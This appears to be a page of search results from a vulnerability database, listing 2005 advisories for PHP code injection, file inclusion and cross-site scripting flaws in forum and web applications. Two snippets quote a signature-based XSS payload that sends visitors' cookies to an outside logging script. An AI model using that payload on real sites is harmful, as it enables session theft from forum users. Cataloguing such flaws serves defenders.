Lucene search

2271 matches found

CVE
added 2005/09/21 4:0 a.m. | 46 views

CVE-2005-3010

CVE-2005-3010 affects CuteNews (version 1.4.0 and earlier). A direct static code injection vulnerability in the flood protection feature (inc/shows.inc.php) allows a remote attacker to inject and execute arbitrary PHP code via the HTTP_CLIENT_IP header (Client-Ip), which is injected into data/flo...

CVSS 7.5 | AI score 7.9 | EPSS 0.02429
Exploits: 1 | References: 3 | Affected Software: 1
NVD
added 2005/09/14 8:3 p.m. | 10 views

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

CVSS 7.5 | AI score 7.9 | EPSS 0.0108
Exploits: 1 | References: 4
Cvelist
added 2005/09/14 4:0 a.m. | 17 views

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

AI score 7.9 | EPSS 0.0108
Exploits: 1 | References: 4
CVE
added 2005/09/14 4:0 a.m. | 53 views

CVE-2005-2893

CVE-2005-2893 affects PBLang 4.65 (and possibly earlier). The vulnerability is a direct static code injection in setcookie.php where the username parameter (u) is directly injected into a file that is later executed upon login, enabling remote code execution. The available sources identify the vu...

CVSS 7.5 | AI score 7.9 | EPSS 0.0108
Exploits: 1 | References: 4 | Affected Software: 1
Tenable Nessus
added 2005/09/08 12:0 a.m. | 193 views

AMember Multiple Script config[root_dir] Parameter Remote File Inclusion

The remote host appears to be running AMember, a commercial membership and subscription management script written in PHP. The version of AMember installed on the remote host fails to properly sanitize user-supplied input to the 'config[root_dir]' parameter before using it in several scripts to inclu...

CVSS 7.5 | AI score 5.9 | EPSS 0.00636
Exploits: 0 | References: 2
UbuntuCve
added 2005/09/02 11:3 p.m. | 21 views

CVE-2005-2781

The Avatar upload feature in FUD Forum before 2.7.0 does not properly verify uploaded files, which allows remote attackers to execute arbitrary PHP code via a file with a .php extension that contains image data followed by PHP code...

CVSS 7.5 | AI score 6.1 | EPSS 0.01269
Exploits: 0 | References: 1
NVD
added 2005/09/02 11:3 p.m. | 19 views

CVE-2005-2775

phpapi.php in phpWebNotes 2.0.0 uses the extract function to modify key variables such as $tpathcore, which leads to a PHP file inclusion vulnerability that allows remote attackers to execute arbitrary PHP code via the tpathcore parameter...

CVSS 7.5 | AI score 7.5 | EPSS 0.02256
Exploits: 1 | References: 4
Packet Storm
added 2005/08/31 12:0 a.m. | 23 views

lduXSS2.txt

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie and post a topic...

AI score 7.4
Exploits: 0
Tenable Nessus
added 2005/08/31 12:0 a.m. | 14 views

Simple Machines Forum < 1.0.7 Code Injection

Binary data 3198.prm...

CVSS 5 | AI score 7.3 | EPSS 0.01316
Exploits: 2 | References: 2
Exploit DB
added 2005/08/31 12:0 a.m. | 35 views

CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary remote PHP code on an affected...

AI score 7.4
Exploits: 0
Cvelist
added 2005/08/29 4:0 a.m. | 17 views

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

AI score 7.3 | EPSS 0.01495
Exploits: 0 | References: 8
securityvulns
added 2005/08/29 12:0 a.m. | 36 views

Land Down Under

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code SCRIPT location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie/SCRIPT an...

Exploits: 0
Tenable Nessus
added 2005/08/29 12:0 a.m. | 714 views

AutoLinks Pro 'al_initialize.php' alpath Parameter Remote File Inclusion

The remote host is running AutoLinks Pro, a commercial link management package. The version of AutoLinks Pro installed on the remote host allows attackers to control the 'alpath' parameter used when including PHP code in the 'al_initialize.php' script. By leveraging this flaw, an unauthenticated...

CVSS 7.5 | AI score 6 | EPSS 0.01116
Exploits: 1 | References: 1
Cvelist
added 2005/08/24 4:0 a.m. | 21 views

CVE-2005-2685

SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability ste...

AI score 7.7 | EPSS 0.00784
Exploits: 1 | References: 2
NVD
added 2005/08/17 4:0 a.m. | 28 views

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie...

CVSS 7.5 | AI score 7.7 | EPSS 0.73416
Exploits: 5 | References: 2
CVE
added 2005/08/17 4:0 a.m. | 63 views

CVE-2005-2612

The CVE covers a Direct code injection vulnerability in WordPress 1.5.1.3 and earlier that allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. Affected software is WordPress (versions prior to 1.5.1.3). Root cause is improper handling of the cache_last...

CVSS 7.5 | AI score 7.7 | EPSS 0.73416
Exploits: 5 | References: 2 | Affected Software: 1
OSV
added 2005/08/17 4:0 a.m. | 8 views

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie...

AI score 7.6
Exploits: 0 | References: 2
NVD
added 2005/08/16 4:0 a.m. | 22 views

CVE-2005-2568

Eval injection vulnerability in the template engine for SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via a string containing the code within "{" and "}" curly bracket characters, which are processed by the PHP eval function...

CVSS 7.5 | AI score 7.7 | EPSS 0.00717
Exploits: 0 | References: 3
exploitpack
added 2005/08/08 12:0 a.m. | 17 views

Gravity Board X 1.1 - CSS Template Unauthorized Access

Gravity Board X 1.1 - CSS Template Unauthorized Access source: https://www.securityfocus.com/bid/14502/info Gravity Board X GBX is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to...

0.7AI score
Exploits0
Exploit DB
Exploit DB
added 2005/08/08 12:0 a.m.18 views

Gravity Board X 1.1 - CSS Template Unauthorized Access

source: https://www.securityfocus.com/bid/14502/info Gravity Board X GBX is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged functions. An attacker can exploit this...

AI score 7.4
Exploits: 0